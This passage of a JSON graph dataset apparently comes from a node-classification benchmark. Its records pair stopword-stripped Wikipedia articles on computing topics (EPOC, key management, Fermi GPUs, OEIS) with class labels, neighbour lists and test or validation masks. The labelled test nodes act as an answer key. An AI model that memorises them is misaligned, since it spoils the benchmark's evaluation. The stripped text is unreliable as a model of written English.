    "text": "EPOC_(operating_system):epoc operating system epoc mobile operating system developed psion british company founded 1980 began 16-bit operating system psion x86-compatible devices later replaced 32-bit system x86 arm psion licensed 32-bit system hardware manufacturers ericsson distinguish 16-bit system 32-bit operating system sometimes epoc32 technologically major departure 16-bit incarnation came called epoc16 sibo 1998 32-bit version renamed symbian os nokia acquired rights symbian 2010 published symbian source code eclipse public license 2011 nokia rescinded open-source license subsequent releases software name epoc comes word epoch beginning era name shortened four letters accord names software innovations unix mach initially operating system capitalised epoc rather 'epoc since acronym change capital letters made recommendation psion marketing department thereafter rumour circulated technical press epoc acronym electronic piece cheese psion started developing 32-bit operating system 1994 kept epoc brand avoid confusion within company started calling old system epoc16 new one epoc32 became conventional within company refer epoc16 sibo codename psion 16-bit mobile computing initiative change freed use name epoc epoc32 june 1998 psion formed limited company telecommunications corporations nokia ericsson motorola buying symbian ltd.—as new company called—the telecommunications corporations acquired stake psion epoc operating system intellectual property symbian ltd. changed name epoc/epoc32 symbian os debuted november 2000 nokia 9210 communicator smartphone epoc developed psion software mobile-device company founded london 1980 company released first pocket computer 1984 8-bit device called psion organiser 1986 released series improved models organiser ii brand 8-bit era ending psion saw need develop 16-bit operating system drive next generation devices first however needed engineer 16-bit single-board computer—something extremely difficult time codenamed project sibo single-board organiser sixteen-bit organiser develop sibo hardware software needed samples 16-bit microprocessors would programming took year secure chips caused significant delay 1987 development epoc underway single-user preemptive multitasking operating system designed run read-only memory rom operating system programmes written intel 8086 assembly language c. operating system started opened pre-installed programmes advance system could switch quickly enable users write run programmes epoc featured updated version organiser programming language opl first published psion organiser opl simple interpreted language unlike basic 1989 psion released first 16-bit computers equipped new operating system mc200 mc400 mc600 notebooks intel 80c86 processor differed specifications memory capacity among later sibo devices psion 3 1991 3a 1993 3c 1996 workabout series well siena 512k model 1996 final epoc device psion series 3mx 1998 user interface differed device notebook computers wimp interface handheld computers smaller screens pointing device accept input keyboard stylus on-screen programmes represented icons smaller devices user could also access via specialised buttons parallel production 16-bit devices psion developing 32-bit version epoc since late 1994 move 32 bits necessary remain competitive psion wanted mobile operating system could license companies meant system would need portable previous efforts 32-bit operating system engineers wrote new object-oriented codebase c++ transition period old system came called epoc16 new one epoc32 epoc16 designed specifically intel 80186 platform epoc32 built arm computing platform reduced instruction set architecture like epoc16 epoc32 single-user pre-emptive multitasking operating system also featured memory protection essential feature modern operating systems psion licensed epoc32 device manufacturers made possible manufacturers change replace system graphical interface licensing arrangement psion considered spinning-off software division psion software psion pdas graphical user interface called eikon visually eikon refinement design choices psion 8- 16-bit devices early iterations epoc32 codenamed protea first published version called release 1 appeared psion series 5 rom v1.0 june 1997 release 2 never published updated rom version 1.1 series 5 featured release 3 series 5 used psion new user interface eikon one first epoc licensees short-lived company called geofox halted production selling fewer 1,000 units another licensee oregon scientific released budget device called osaris epoc device ship release 4 epoc release 5 premiered march 1999 ran armv4 processors strongarm series addition email messaging data synchronisation features introduced support java development kit made capable running wider variety programmes 2000 epoc gui variations replaced three reference interfaces crystal devices small keyboard quartz communicator devices telecommunication features tended equipped thumb keyboard pearl mobile phones classification supported vga graphics psion deployed release 5 5mx series 1999 revo 1999 netbook 1999 series 7 1999 revo plus 2000 netpad 2001 devices ericsson rebranded psion series 5mx mc218 sonicblue rebranded revo diamond mako like original devices rebranded versions released 1999 ericsson r380 smartphone released november 2000 first device distributed epoc release 5.1 release also known er5u u indicated system supported unicode system text encoding important feature representation diverse languages psion developed er5u-enabled device codenamed conan advance beyond prototype stage device intended bluetooth-enabled successor revo june 1998 psion software became symbian ltd. major joint venture psion phone manufacturers ericsson motorola nokia next release epoc32 release 6 rebranded symbian os decoupled user interface underlying operating system afforded device manufacturers ability burden implementing graphical interface devices final version symbian os released v10.1 final update published 2012",
    "neighbors": [
      2179,
      6276,
      8829,
      11271,
      7561,
      4364,
      3089,
      7442,
      5395,
      6675,
      7187,
      10393,
      6301,
      5406,
      4383,
      673,
      3626,
      7727,
      3248,
      7857,
      10548,
      7991,
      9784,
      1083,
      1216,
      5824,
      7492,
      8262,
      11079,
      8136,
      7246,
      2001,
      4305,
      2259,
      11603,
      7253,
      3542,
      3162,
      477,
      607,
      10080,
      2658,
      8423,
      8551,
      3561,
      10215,
      6763,
      6508,
      9964,
      5358,
      495,
      10599,
      499,
      1524,
      5363,
      5492,
      5369,
      8315,
      8316,
      2045,
      11391
    ],
    "mask": "Test"
  },
  {
    "node_id": 2926,
    "label": 4,
    "text": "SecurityScorecard:securityscorecard securityscorecard information security company rates cybersecurity postures corporate entities scored analysis cyber threat intelligence signals purposes third party management risk management company based new york city new york united states rated cyber security exposures 1,000,000 global companies across 17 categorized industries securityscorecard founded 2013 ceo aleksandr yampolskiy coo sam kassoumeh cro alexander heid joined organization 2014 team guided early stages company 2018 reports indicate company reached size 130 employees january 2017 president donald trump cited securityscorecard report president first public press conference commenting findings annual securityscorecard government cybersecurity report report indicated us government network systems 'the worst level risk compared industries securityscorecard software service platform collects attributes scores overall health enterprise cybersecurity identification exposed vulnerabilities corporate digital assets discovered public internet color-coded letter grades numerical scores calculated based upon identification security vulnerabilities corporate digital assets enterprises scored multiple categories risk web application security network security public availability breached data ip reputation mentions within underground hacker chatter susceptibility social engineering attacks platform used companies satisfy continuous monitoring compliance requirements related digital supply chains well enforcement grc standards securityscorecard used following markets financial services cyber insurance hospitality e-commerce energy public sector retail telecommunications cloud service providers software service providers securityscorecard received financing rounds sequoia capital gv nokia intel moody ngp capital riverwood capital",
    "neighbors": [
      4194,
      1251,
      5636,
      939,
      11567,
      467,
      10492,
      9145,
      4956,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2927,
    "label": 9,
    "text": "Operation_Reduction_for_Low_Power:operation reduction low power operation reduction low power asic program transformation technique used reduce power consumed specific application program transformation operation changes computational structure nature type computational models interconnections sequencing operations keeping input output behavior intact basically use operation reduction reduce number operations done perform task reduces hardware required turn power consumption example given application specific ic reducing number independent additions required automatically reduces adders required also power consumed operation substitution one operation reduction techniques certain costly operations substituted relatively cheaper operations reduce power consumption typical examples operation substitution techniques given follows popular example operation substitution butterfly example example need compute two values x x x x done sequentially computing terms shown expressions using operation substitution compute using expressions a* x+x x a+a a* x+x x a-a term x+x computed used computations easily workout operations changed number operations changed 4 multiplications 3 2 add/sub 3 critical path first method length 2 latter 3 trade-off delay power based frequency input changing model program less activity switching happens i.e certain inputs less frequently changing made operating single module particular module relatively passive compared others a+b+c+d computed a+b +c+d a+b c+d first one feeds c 2 separate adders relatively slow changing feeding adder profitable synthesis 3 parts allocation number type resources scheduling operation scheduling binding building circuit schedule operations particular order based value program activates many modules always want operations requiring operations completed hand scheduled later consider following code snippet c 0 let us assume profiling shown likely value c 2 therefore c independent mutually exclusive modify code c 2 « 1 else c 0 multiplication replaced shifting operation triggered cases far cheaper multiplication",
    "neighbors": [
      4980
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2928,
    "label": 4,
    "text": "Reflection_attack:reflection attack computer security reflection attack method attacking challenge-response authentication system uses protocol directions challenge-response protocol used side authenticate side essential idea attack trick target providing answer challenge general attack outline follows authentication protocol carefully designed target accept response valid thereby leaving attacker one fully authenticated channel connection one simply abandoned common solutions attack described",
    "neighbors": [
      4552,
      4863,
      8694,
      7863,
      5433,
      2558,
      6975
    ],
    "mask": "None"
  },
  {
    "node_id": 2929,
    "label": 9,
    "text": "XBase++:xbase++ xbase++ object oriented programming language multiple inheritance polymorphism based xbase language dialect conventions 100 clipper compatible language supporting multiple inheritance polymorphism object oriented programming supports xbase data types including codeblocks xbase++ possible generate applications windows nt 95 98 2000 xp vista windows 7 xbase++ supports old commands say/get define data entry forms well graphic editor create data entry forms similar visual foxpro also visual development environment support oem files dos format ansi windows integrated debugger resource compiler add icons graphics application generate exe dll files xbase++ supports replaceable database drivers rdd provide access multiple database formats clipper databaseengines dbes basic package includes support dbf fox ntx cdx sdf del delimited also supports corba 2.0 visual foxpro 3.0 5.0 database formats access sql servers xbase++ born decision computer associates abandon clipper develop visual objects failure visual objects clipper substitute empowered creation third party libraries creation clipper syntax compilers",
    "neighbors": [
      6112,
      4614,
      6631,
      8262,
      4042,
      3435,
      11574,
      2903,
      5374
    ],
    "mask": "None"
  },
  {
    "node_id": 2930,
    "label": 2,
    "text": "Startup_Disk_Creator:startup disk creator startup disk creator usb-creator official tool create live usbs ubuntu live cd iso image tool included default releases ubuntu 8.04 installed ubuntu 8.04 kde frontend released ubuntu 8.10 currently included default kubuntu installations run current version ubuntu distributions enter either usb-creator-gtk usb-creator-kde command line tool available ubuntu gnome 11.04 17.04 also called unity kubuntu kde also windows starting ubuntu 10.10 maverick meerkat accessible inserting live cd cd-rom drive windows running",
    "neighbors": [
      1801,
      11669,
      3478,
      8476,
      4637,
      926,
      5410,
      3245,
      6445,
      7983,
      8112,
      439,
      10687,
      3654,
      5962,
      975,
      1107,
      4951,
      3550,
      5343,
      4192,
      6625,
      7140,
      5990,
      7913,
      8554,
      7020,
      9324,
      8177,
      9971,
      1396,
      3189,
      5369,
      5755,
      6012,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 2931,
    "label": 4,
    "text": "Michał_Zalewski:michał zalewski michał zalewski born 19 january 1981 also known user name lcamtuf computer security expert white hat hacker poland former google inc. employee currently vp security engineering snap inc.. prolific vulnerability researcher frequent bugtraq poster since mid-1990s written number programs unix-like operating systems 2005 zalewski wrote silence wire field guide passive reconnaissance indirect attacks computer security book published starch press subsequently translated number languages 2011 zalewski wrote tangled web guide securing modern web applications also published starch press continued research browser security named one 15 influential people security among 100 influential people zalewski one original creators argante virtual open source operating system among projects also created p0f american fuzzy lop",
    "neighbors": [
      161,
      450,
      7983,
      8787,
      5397,
      4956,
      2717,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2932,
    "label": 4,
    "text": "Key_management:key management key management refers management cryptographic keys cryptosystem includes dealing generation exchange storage use crypto-shredding destruction replacement keys includes cryptographic protocol design key servers user procedures relevant protocols key management concerns keys user level either users systems contrast key scheduling typically refers internal handling keys within operation cipher successful key management critical security cryptosystem challenging side cryptography sense involves aspects social engineering system policy user training organizational departmental interactions coordination elements contrast pure mathematical practices automated cryptographic systems may use different types keys systems using one may include symmetric keys asymmetric keys symmetric key algorithm keys involved identical encrypting decrypting message keys must chosen carefully distributed stored securely asymmetric keys also known public keys contrast two distinct keys mathematically linked typically used together communicate public key infrastructure pki implementation public key cryptography requires organization establish infrastructure create manage public private key pairs along digital certificates starting point certificate private key management strategy create comprehensive inventory certificates locations responsible parties trivial matter certificates variety sources deployed variety locations different individuals teams simply possible rely list single certificate authority certificates renewed replaced expire cause serious downtime outages considerations keys inventoried key management typically consists three steps exchange storage use prior secured communication users must set details cryptography instances may require exchanging identical keys case symmetric key system others may require possessing party public key public keys openly exchanged corresponding private key kept secret symmetric keys must exchanged secure communication channel formerly exchange key extremely troublesome greatly eased access secure channels diplomatic bag clear text exchange symmetric keys would enable interceptor immediately learn key encrypted data advance public key cryptography 1970s made exchange keys less troublesome since diffie-hellman key exchange protocol published 1975 become possible exchange key insecure communications channel substantially reduced risk key disclosure distribution possible using something akin book code include key indicators clear text attached encrypted message encryption technique used richard sorge code clerk type referring page statistical manual though fact code german army enigma symmetric encryption key mixed type early use key combination secretly distributed key schedules user chosen session key component message modern systems openpgp compatible systems session key symmetric key algorithm distributed encrypted asymmetric key algorithm approach avoids even necessity using key exchange protocol like diffie-hellman key exchange another method key exchange involves encapsulating one key within another typically master key generated exchanged using secure method method usually cumbersome expensive breaking master key multiple parts sending trusted courier example suitable use larger scale master key securely exchanged used securely exchange subsequent keys ease technique usually termed key wrap common technique uses block ciphers cryptographic hash functions related method exchange master key sometimes termed root key derive subsidiary keys needed key data often referred diversification data common use method probably smartcard-based cryptosystems found banking cards bank credit network embeds secret key card secure key storage card production secured production facility point sale card card reader able derive common set session keys based shared secret key card-specific data card serial number method also used keys must related i.e. departmental keys tied divisional keys individual keys tied departmental keys however tying keys way increases damage may result security breach attackers learn something one key reduces entropy regard attacker key involved however distributed keys must stored securely maintain communications security security big concern hence various techniques use likely common encryption application manages keys user depends access password control use key likewise case smartphone keyless access platforms keep identifying door information mobile phones servers encrypt data like low-tech keys users give codes trust major issue length time key used therefore frequency replacement increases attacker required effort keys frequently changed also limits loss information number stored encrypted messages become readable key found decrease frequency key change increases historically symmetric keys used long periods situations key exchange difficult possible intermittently ideally symmetric key change message interaction message become readable key learned e.g stolen cryptanalyzed social engineered several challenges organizations face trying control manage encryption keys key management compliance refers oversight assurance capability able demonstrate keys securely managed includes following individual compliance domains compliance achieved respect national international data protection standards regulations payment card industry data security standard health insurance portability accountability act sarbanes–oxley act general data protection regulation key management system kms also known cryptographic key management system ckms integrated approach generating distributing managing cryptographic keys devices applications may cover aspects security secure generation keys secure exchange keys secure key handling storage client thus kms includes backend functionality key generation distribution replacement well client functionality injecting keys storing managing keys devices many specific applications developed key management systems home grown protocols however systems become interconnected keys need shared different systems facilitate key management standards evolved define protocols used manage exchange cryptographic keys related information kmip extensible key management protocol developed many organizations working within oasis standards body first version released 2010 developed active technical committee protocol allows creation keys distribution among disparate software systems need utilize covers full key life cycle symmetric asymmetric keys variety formats wrapping keys provisioning schemes cryptographic operations well meta data associated keys protocol backed extensive series test cases interoperability testing performed compliant systems year list 80 products conform kmip standard found oasis website security policy key management system provides rules used protect keys metadata key management system supports defined national institute standards technology nist policy shall establish specify rules information protect protection covers complete key life-cycle time key becomes operational elimination bring encryption byoe —also called bring key byok —refers cloud-computing security model allow public-cloud customers use encryption software manage encryption keys security model usually considered marketing stunt critical keys handed third parties cloud providers key owners still left operational burden generating rotating sharing keys public-key infrastructure type key management system uses hierarchical digital certificates provide authentication public keys provide encryption pkis used world wide web traffic commonly form ssl tls group key management means managing keys group communication group communications use multicast communication message sent sender received users main problem multicast group communication security order improve security various keys given users using keys users encrypt messages send secretly ietf.org released rfc 4046 entitled multicast security msec group key management architecture discusses challenges group key management q* ieee security storage working group siswg creating p1619.3 standard key management",
    "neighbors": [
      2050,
      2818,
      517,
      141,
      5389,
      6159,
      5136,
      9745,
      8471,
      8603,
      419,
      6309,
      10918,
      1196,
      3629,
      9901,
      4784,
      2737,
      434,
      8760,
      3780,
      9924,
      10831,
      1616,
      8674,
      361,
      4979,
      4221,
      5373,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 2933,
    "label": 2,
    "text": "Disk_operating_system:disk operating system disk operating system abbreviated dos computer operating system use disk storage device floppy disk hard disk drive optical disc disk operating system must provide file system organizing reading writing files storage disk strictly speaking definition apply current generations operating systems versions microsoft windows use appropriately used older generations operating systems disk operating systems available mainframes microprocessors home computers usually loaded disks part boot process early days computers disk drives floppy disks modern flash storage devices early storage devices delay lines punched cards paper tape magnetic tape magnetic drums used instead early days microcomputers home computers paper tape audio cassette tape see kansas city standard nothing used instead latter case program data entry done front panel switches directly memory computer terminal keyboard sometimes controlled basic interpreter rom power turned information lost hard disks floppy disk drives require software manage rapid access block storage sequential data microcomputers disk drive kind optional peripheral systems could used tape drive booted without storage device disk operating system component operating system needed disk drive used dos concept began dos/360 1966 ibm system/360 mainframes home personal computers late 1970s 1980s used disk operating system often dos name simply referred dos within respective communities cbm dos commodore 8-bit systems atari dos atari 8-bit family trs-dos trs-80 apple dos apple ii ms-dos ibm pc compatibles usually disk operating system loaded disk among exceptions commodore whose dos resided rom chips disk drives lt. kernal hard disk subsystem commodore 64 commodore 128 models stored dos disk case modern systems loaded dos ram boot time british bbc micro optional disc filing system dfs offered kit disk controller chip rom chip handful logic chips installed inside computer disk operating systems operating system entire computer system",
    "neighbors": [
      6148,
      8713,
      4114,
      6675,
      532,
      7187,
      7188,
      10776,
      25,
      4637,
      9762,
      5158,
      7217,
      9784,
      10809,
      8767,
      576,
      10818,
      8774,
      10333,
      97,
      8298,
      8301,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150,
      2179,
      10883,
      6797,
      6289,
      9366,
      6296,
      4764,
      7325,
      9887,
      3248,
      689,
      178,
      8369,
      9907,
      6837,
      8388,
      9932,
      5840,
      7382,
      8410,
      1253,
      10475,
      5359,
      4337,
      5363,
      2811,
      3323,
      10499,
      1804,
      273,
      11539,
      7959,
      11033,
      10016,
      7969,
      2345,
      9006,
      7983,
      823,
      4409,
      7483,
      11075,
      10564,
      4423,
      5457,
      11601,
      10590,
      8551,
      5492,
      2432,
      394,
      3978,
      7057,
      11667,
      11673,
      8092,
      421,
      11184,
      6075,
      6078,
      9151,
      8136,
      9166,
      6128,
      499,
      5619,
      10235
    ],
    "mask": "Test"
  },
  {
    "node_id": 2934,
    "label": 5,
    "text": "H-TCP:h-tcp h-tcp another implementation tcp optimized congestion control algorithm high speed networks high latency lfn long fat networks created researchers hamilton institute ireland h-tcp optional module recent linux 2.6 kernels implemented freebsd 7 h-tcp loss-based algorithm using additive-increase/multiplicative-decrease aimd control tcp congestion window one many tcp congestion avoidance algorithms seeks increase aggressiveness tcp high bandwidth-delay product bdp paths maintaining tcp friendliness small bdp paths h-tcp increases aggressiveness particular rate additive increase time since previous loss increases avoids problem encountered hstcp bic tcp making flows aggressive windows already large thus new flows expected converge fairness faster htcp hstcp bic tcp side effect increasing rate increase time since last packet loss increases flows happen lose packet flows take unfair portion bandwidth techniques overcome currently research phase linux implementation h-tcp also option avoiding rtt unfairness occurs tcp reno particular problem high speed variants tcp although fast tcp algorithm initially introduced h-tcp without mention h stands however often called hamilton tcp hamilton institute created",
    "neighbors": [
      8648,
      7017,
      10124,
      10924,
      823,
      5817,
      9021,
      10653
    ],
    "mask": "Test"
  },
  {
    "node_id": 2935,
    "label": 3,
    "text": "AMD_APP_SDK:amd app sdk amd app sdk software development kit amd accelerated parallel processing app amd app sdk also targets heterogeneous system architecture gpu amd app sdk available 32-bit 64-bit versions microsoft windows linux removed amd official website developer stated forum post sdk discontinued required libraries included drivers amd intends developers employ amd app sdk utilize video coding engine hybrid mode create hybrid encoders pair custom motion estimation inverse discrete cosine transform motion compensation hardware entropy encoding achieve faster real-time encoding app sdk 3.0 supports opencl™ 2.0 catalyst omega 15.7 driver amd app sdk v3.0 beta includes samples opencl™ well accelerated libraries bolt open-source c++ template library opencl™ accelerated opencv open computer vision library amd app sdk replaced amd stream sdk formerly named ati stream sdk amd cal compute abstraction layer sdk replaced ati stream sdk available microsoft windows linux 32-bit 64-bit",
    "neighbors": [
      2850,
      3586,
      3204,
      10658,
      1510,
      1480,
      11080,
      876,
      6797,
      7983,
      6705,
      823,
      11130,
      11485
    ],
    "mask": "Test"
  },
  {
    "node_id": 2936,
    "label": 9,
    "text": "Identifier:identifier identifier name identifies labels identity either unique object unique class objects object class may idea physical countable object class thereof physical noncountable substance class thereof abbreviation id often refers identity identification process identifying identifier instance identification identifier may word number letter symbol combination words numbers letters symbols may follow encoding system wherein letters digits words symbols stand represent ideas longer names may simply arbitrary identifier follows encoding system often referred code id code instance iso/iec 11179 metadata registry standard defines code system valid symbols substitute longer values contrast identifiers without symbolic meaning identifiers follow encoding scheme often said arbitrary ids arbitrarily assigned greater meaning sometimes identifiers called codes even actually arbitrary whether speaker believes deeper meaning simply speaking casually imprecisely unique identifier uid identifier refers one instance —only one particular object universe part number identifier unique identifier—for serial number needed identify instance part design thus identifier model identifies class model automobiles ford model comprises whereas unique identifier model serial number 159,862 identifies one specific member class—that one particular model car owned one specific person concepts name identifier denotatively equal terms thus denotatively synonymous always connotatively synonymous code names id numbers often connotatively distinguished names sense traditional natural language naming example jamie zawinski netscape employee number 20 identifiers specific human normal english-language connotation may consider jamie zawinski name identifier whereas considers netscape employee number 20 identifier name emic indistinction rather etic one metadata identifier language-independent label sign token uniquely identifies object within identification scheme suffix identifier also used representation term naming data element id codes may inherently carry metadata along example know food package front identifier 42z-mfr5-p02-243-45 data also metadata tells packaged september 25 2011 3:42pm utc manufactured licensed vendor number 5 peoria il usa plant building 2 243rd package line shift inspected inspector number 45 arbitrary identifiers might lack metadata example food package says 100054678214 id may tell anything except identity—no date manufacturer name production sequence rank inspector number cases arbitrary identifiers sequential serial numbers leak information i.e german tank problem opaque identifiers—identifiers designed avoid leaking even small amount information—include really opaque pointers version 4 uuids computer science identifiers ids lexical tokens name entities identifiers used extensively virtually information processing systems identifying entities makes possible refer essential kind symbolic processing computer languages identifiers tokens also called symbols name language entities kinds entities identifier might denote include variables types labels subroutines packages character sequences constitute identifiers depends lexical grammar language common rule alphanumeric sequences underscore also allowed condition begin digit simplify lexing avoiding confusing integer literals – codice_1 allowed codice_2 – definition used earlier versions c c++ python many languages later versions languages along many modern languages support almost unicode characters identifier however common restriction permit whitespace characters language operators simplifies tokenization making free-form context-free example forbidding codice_3 identifiers due use binary operation means codice_4 codice_5 tokenized allowed codice_4 would identifier addition whitespace identifier particularly problematic spaces allowed identifiers clause codice_7 legal codice_8 identifier tokenizing requires phrasal context condition clause languages allow spaces identifiers however algol 68 algol variants – example following valid statement codice_9 could entered codice_10 keywords represented boldface concretely via stropping algol possible keywords syntactically differentiated risk collision ambiguity spaces eliminated line reconstruction phase source processed via scannerless parsing lexing could context-sensitive languages character sequences lexical form identifier known keywords – example codice_11 frequently keyword clause lexically form codice_12 codice_13 namely sequence letters overlap handled various ways may forbidden identifiers – simplifies tokenization parsing – case reserved words may allowed distinguished ways via stropping keyword sequences may allowed identifiers sense determined context requires context-sensitive lexer non-keywords may also reserved words forbidden identifiers particularly forward compatibility case word may become keyword future languages e.g. pl/1 distinction clear scope accessibility within program identifier either local global global identifier declared outside functions available throughout program local identifier declared within specific function available within function implementations programming languages using compiler identifiers often compile time entities runtime compiled program contains references memory addresses offsets rather textual identifier tokens memory addresses offsets assigned compiler identifier languages support reflection interactive evaluation source code using interpreter incremental compiler identifiers also runtime entities sometimes even first-class objects freely manipulated evaluated lisp called symbols compilers interpreters usually assign semantic meaning identifier based actual character sequence used however exceptions example languages go identifiers uniqueness based spelling visibility html identifier one possible attributes html element unique within document many resources may carry multiple identifiers typical examples inverse also possible multiple resources represented identifier discussed many codes nomenclatural systems originate within small namespace years bleed larger namespaces people interact ways formerly n't e.g. cross-border trade scientific collaboration military alliance general cultural interconnection assimilation dissemination happens limitations original naming convention formerly latent moot become painfully apparent often necessitating retronymy synonymity translation/transcoding limitations generally accompany shift away original context broader one typically system shows implicit context context formerly assumed narrow lack capacity e.g. low number possible ids reflecting outmoded narrow context lack extensibility features defined reserved future needs lack specificity disambiguating capability related context shift longstanding uniqueness encounters novel nonuniqueness within computer science problem called naming collision story origination expansion coden system provides good case example recent-decades technical-nomenclature context capitalization variations seen specific designators reveals instance problem occurring natural languages proper noun/common noun distinction complications must dealt universe every object uid would need namespaces say would constitute one gigantic namespace human minds could never keep track semantically interrelate many uids",
    "neighbors": [
      128,
      899,
      8582,
      2316,
      10510,
      655,
      10258,
      2585,
      11674,
      1435,
      2204,
      6813,
      10011,
      3999,
      1952,
      10013,
      10145,
      547,
      11173,
      6061,
      9397,
      1724,
      6335,
      8262,
      8775,
      1611,
      5452,
      7627,
      3923,
      6102,
      10585,
      477,
      10083,
      9828,
      6502,
      10854,
      9576,
      6633,
      8554,
      6002,
      9075,
      10739,
      10102,
      3960,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2937,
    "label": 3,
    "text": "Fermi_(microarchitecture):fermi microarchitecture fermi codename gpu microarchitecture developed nvidia first released retail april 2010 successor tesla microarchitecture primary microarchitecture used geforce 400 series geforce 500 series followed kepler used alongside kepler geforce 600 series geforce 700 series geforce 800 series latter two mobile gpus workstation market fermi found use quadro x000 series quadro nvs models well nvidia tesla computing modules desktop fermi gpus manufactured 40 nm mobile fermi gpus 40 nm 28 nm fermi oldest microarchitecture nvidia received support microsoft rendering api direct3d 12 feature_level 11 architecture named enrico fermi italian physicist fermi graphic processing units gpus feature 3.0 billion transistors schematic sketched fig 1 sm features 32 single-precision cuda cores 16 load/store units four special function units sfus 64kb block high speed on-chip memory see l1+shared memory subsection interface l2 cache see l2 cache subsection load/store units allow source destination addresses calculated 16 threads per clock load store data from/to cache dram special functions units sfus execute transcendental instructions sin cosine reciprocal square root sfu executes one instruction per thread per clock warp executes eight clocks sfu pipeline decoupled dispatch unit allowing dispatch unit issue execution units sfu occupied integer arithmetic logic unit alu supports full 32-bit precision instructions consistent standard programming language requirements also optimized efficiently support 64-bit extended precision operations floating point unit fpu implements new ieee 754-2008 floating-point standard providing fused multiply-add fma instruction see fused multiply-add subsection single double precision arithmetic 16 double precision fused multiply-add operations performed per sm per clock fused multiply-add fma perform multiplication addition i.e. a*b+c single final rounding step loss precision addition fma accurate performing operations separately fermi architecture uses two-level distributed thread scheduler sm issue instructions consuming two four green execution columns shown schematic fig 1 example sm mix 16 operations 16 first column cores 16 operations 16 second column cores 16 operations load/store units four sfus combinations program specifies note 64-bit floating point operations consumes first two execution columns implies sm issue 32 single-precision 32-bit floating point operations 16 double-precision 64-bit floating point operations time gigathread engine gigathread engine schedules thread blocks various sms dual warp scheduler sm level warp scheduler distributes warps 32 threads execution units threads scheduled groups 32 threads called warps sm features two warp schedulers two instruction dispatch units allowing two warps issued executed concurrently dual warp scheduler selects two warps issues one instruction warp group 16 cores 16 load/store units 4 sfus instructions dual issued two integer instructions two floating instructions mix integer floating point load store sfu instructions issued concurrently double precision instructions support dual dispatch operation theoretical single-precision processing power fermi gpu gflops computed 2 operations per fma instruction per cuda core per cycle × number cuda cores × shader clock speed ghz note previous generation tesla could dual-issue mad+mul cuda cores sfus parallel fermi lost ability issue 32 instructions per cycle per sm keeps 32 cuda cores fully utilized therefore possible leverage sfus reach 2 operations per cuda core per cycle theoretical double-precision processing power fermi gpu 1/2 single precision performance gf100/110 however practice double-precision power available professional quadro tesla cards consumer geforce cards capped 1/8 l1 cache per sm unified l2 cache services operations load store texture registers sm 32k 32-bit registers thread access registers threads maximum number registers used cuda kernel 63 number available registers degrades gracefully 63 21 workload hence resource requirements increases number threads registers high bandwidth 8,000 gb/s l1+shared memory on-chip memory used either cache data individual threads register spilling/l1 cache and/or share data among several threads shared memory 64 kb memory configured either 48 kb shared memory 16 kb l1 cache 16 kb shared memory 48 kb l1 cache shared memory enables threads within thread block cooperate facilitates extensive reuse on-chip data greatly reduces off-chip traffic shared memory accessible threads thread block provides low-latency access 10-20 cycles high bandwidth 1,600 gb/s moderate amounts data intermediate results series calculations one row column data matrix operations line video etc. david patterson says shared memory uses idea local scratchpad local memory local memory meant memory location used hold spilled registers register spilling occurs thread block requires register storage available sm local memory used automatic variables declared device code without nowiki __device__ __shared__ __constant__ /nowiki qualifiers generally automatic variable resides register except following 1 arrays compiler determine indexed constant quantities 2 large structures arrays would consume much register space variable compiler decides spill local memory kernel uses registers available sm l2 cache 768 kb unified l2 cache shared among 16 sms services load store from/to global memory including copies to/from cpu host also texture requests l2 cache subsystem also implements atomic operations used managing access data must shared across thread blocks even kernels global memory accessible threads well host cpu high latency 400-800 cycles see nvidia nvdec formerly called nvcuvid well nvidia purevideo nvidia nvenc",
    "neighbors": [
      3585,
      3203,
      398,
      9489,
      2339,
      7086,
      9774,
      9911,
      11322,
      8514,
      7111,
      2635,
      10971,
      2525,
      2277,
      8937,
      11630,
      1776,
      6900,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 2938,
    "label": 9,
    "text": "John_Hughes_(computer_scientist):john hughes computer scientist r. john m. hughes born swedish computer scientist professor department computing science chalmers university technology 1984 hughes received phd university oxford thesis design implementation programming languages hughes member functional programming group chalmers much research relates haskell programming language research field programming languages author many influential research papers subject including functional programming matters hughes one developers quickcheck well cofounder ceo quviq provides quickcheck software offers classes use 2016 appeared popular science youtube channel computerphile explaining functional programming quickcheck hughes elected acm fellow 2018 contributions software testing functional programming",
    "neighbors": [
      6536,
      3876,
      3823
    ],
    "mask": "None"
  },
  {
    "node_id": 2939,
    "label": 1,
    "text": "On-Line_Encyclopedia_of_Integer_Sequences:on-line encyclopedia integer sequences on-line encyclopedia integer sequences oeis also cited simply sloane online database integer sequences created maintained neil sloane researcher labs foreseeing retirement labs 2012 need independent foundation sloane agreed transfer intellectual property hosting oeis oeis foundation october 2009 sloane president oeis foundation oeis records information integer sequences interest professional amateur mathematicians widely cited contains 320,000 sequences making largest database kind entry contains leading terms sequence keywords mathematical motivations literature links including option generate graph play musical representation sequence database searchable keyword subsequence neil sloane started collecting integer sequences graduate student 1965 support work combinatorics database first stored punched cards published selections database book form twice books well received especially second publication mathematicians supplied sloane steady flow new sequences collection became unmanageable book form database reached 16,000 entries sloane decided go online—first e-mail service august 1994 soon web site 1996 spin-off database work sloane founded journal integer sequences 1998 database continues grow rate 10,000 entries year sloane personally managed 'his sequences almost 40 years starting 2002 board associate editors volunteers helped maintain database 2004 sloane celebrated addition 100,000th sequence database counts marks ishango bone 2006 user interface overhauled advanced search capabilities added 2010 oeis wiki oeis.org created simplify collaboration oeis editors contributors 200,000th sequence added database november 2011 initially entered a200715 moved a200000 week discussion seqfan mailing list following proposal oeis editor-in-chief charles greathouse choose special sequence a200000 besides integer sequences oeis also catalogs sequences fractions digits transcendental numbers complex numbers transforming integer sequences sequences rationals represented two sequences named keyword 'frac sequence numerators sequence denominators example fifth-order farey sequence formula_1 catalogued numerator sequence 1 1 1 2 1 3 2 3 4 denominator sequence 5 4 3 5 2 5 3 4 5 important irrational numbers π 3.1415926535897 ... catalogued representative integer sequences decimal expansions 3 1 4 1 5 9 2 6 5 3 5 8 9 7 9 3 2 3 8 4 6 2 6 4 3 3 8 3 2 7 9 5 0 2 8 8 ... binary expansions 1 1 0 0 1 0 0 1 0 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 ... continued fraction expansions 3 7 15 1 292 1 1 1 2 1 3 1 14 2 1 1 2 2 2 2 1 84 2 1 1 